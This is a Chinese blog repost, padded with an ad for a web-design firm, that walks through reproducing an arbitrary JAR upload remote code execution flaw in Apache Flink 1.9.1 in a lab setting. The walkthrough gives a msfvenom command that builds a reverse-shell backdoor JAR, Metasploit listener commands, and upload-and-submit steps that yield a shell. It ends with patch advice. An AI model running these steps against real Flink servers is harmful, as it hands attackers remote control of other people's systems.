这篇文章给大家分享的是有关Apache Flink任意Jar包上传致RCE漏洞的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
成都创新互联公司是专业的玉龙网站建设公司,玉龙接单;提供网站设计制作、成都网站建设,网页设计,网站设计,建网站,PHP网站建设等专业做网站服务;采用PHP框架,可快速的进行玉龙网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,专业的做网站团队,希望更多企业前来合作!
0x01漏洞概述
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的
0x02影响范围
到目前Apache Flink 1.9.1版本
0x03环境搭建
攻击机:kali
受害机:ubuntu16
1. 安装java8环境,自行百度教程
2. 下载Flink1.9.1版本,然后解压安装包
Flink下载地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
解压 tar -zxvf
3. 进入bin目录运行./start-cluster.sh启动环境
4.在浏览器打开,出现以下界面表示安装成功
0x04漏洞复现
1. 首先使用kali生成jar的后门包
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar
2.使用msfconsole监听shell设置的端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
3.run开启监听
4.把制作好的shell.jar包访问目标站点并上传shell.jar
5.点击Submit触发漏洞,反弹回了shell
0x05修复建议
更新官方补丁或更新最新版本
感谢各位的阅读!关于“Apache Flink任意Jar包上传致RCE漏洞的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
新闻名称:ApacheFlink任意Jar包上传致RCE漏洞的示例分析
标题链接:http://lswzjz.com/article/poocdi.html